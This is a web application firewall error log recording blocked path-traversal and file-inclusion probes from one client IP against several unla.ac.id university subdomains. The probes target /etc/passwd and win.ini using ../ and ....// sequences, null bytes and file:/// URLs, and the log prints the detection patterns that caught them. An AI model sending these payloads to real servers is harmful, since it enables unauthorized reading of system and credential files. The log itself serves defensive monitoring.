[Tue Aug 29 11:44:53.593622 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13xcCo-f0AAAfEB0EAAAAO"]
[Tue Aug 29 11:44:55.433059 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13x8Co-f0AAAe3@IUAAAAA"]
[Tue Aug 29 11:44:55.497624 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13x8Co-f0AAAfEB0oAAAAO"]
[Tue Aug 29 11:44:56.409609 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfZj@gAAAAN"]
[Tue Aug 29 11:44:56.418255 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAARphI0AAAAU"]
[Tue Aug 29 11:44:56.521606 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfbkuIAAAAZ"]
[Tue Aug 29 11:44:56.553457 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13yMCo-f0AAAfZj@wAAAAN"]
[Tue Aug 29 11:44:56.559898 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfbkuQAAAAZ"]
[Tue Aug 29 11:44:56.609908 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfSWhMAAAAB"]
[Tue Aug 29 11:44:57.423116 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ycCo-f0AAAfGagsAAAAT"]
[Tue Aug 29 11:44:57.511521 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13ycCo-f0AAAftVH0AAAAf"]
[Tue Aug 29 11:44:57.554641 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ycCo-f0AAAfSWhkAAAAB"]
[Tue Aug 29 11:44:57.603098 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ycCo-f0AAAhMtVcAAAAM"]
[Tue Aug 29 11:44:58.436237 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAfZj-UAAAAN"]
[Tue Aug 29 11:44:58.682269 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAdQ3w0AAAAV"]
[Tue Aug 29 11:44:58.968418 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAhISRMAAAAH"]
[Tue Aug 29 11:44:58.988498 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAhISRQAAAAH"]
[Tue Aug 29 11:44:59.396297 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAfSWh8AAAAB"]
[Tue Aug 29 11:44:59.436222 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAg@ABIAAAAQ"]
[Tue Aug 29 11:44:59.457301 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAheaXcAAAAY"]
[Tue Aug 29 11:45:00.422602 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAg-pMwAAAAR"]
[Tue Aug 29 11:45:00.726644 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAfSWiMAAAAB"]
[Tue Aug 29 11:45:00.779311 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhoHK8AAAAl"]
[Tue Aug 29 11:45:00.853964 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhuiwsAAAAr"]
[Tue Aug 29 11:45:00.863169 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhxwkcAAAAv"]
[Tue Aug 29 11:45:00.883196 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAh13tYAAAAz"]
[Tue Aug 29 11:45:01.058237 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAARphJcAAAAU"]
[Tue Aug 29 11:45:01.076982 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zcCo-f0AAAh13tcAAAAz"]
[Tue Aug 29 11:45:01.120145 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAg-pM8AAAAR"]
[Tue Aug 29 11:45:01.367468 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAh4DWoAAAA2"]
[Tue Aug 29 11:45:01.376986 2023] [:error] [pid 2151] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAhnIh8AAAAk"]
[Tue Aug 29 11:45:01.381905 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zcCo-f0AAAfbku4AAAAZ"]
[Tue Aug 29 11:45:02.361247 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAfGag8AAAAT"]
[Tue Aug 29 11:45:02.424858 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhzvaIAAAAx"]
[Tue Aug 29 11:45:02.431075 2023] [:error] [pid 2166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAh2H2QAAAA0"]
[Tue Aug 29 11:45:02.432705 2023] [:error] [pid 2162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhyKWAAAAAw"]
[Tue Aug 29 11:45:02.439180 2023] [:error] [pid 2151] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhnIiEAAAAk"]
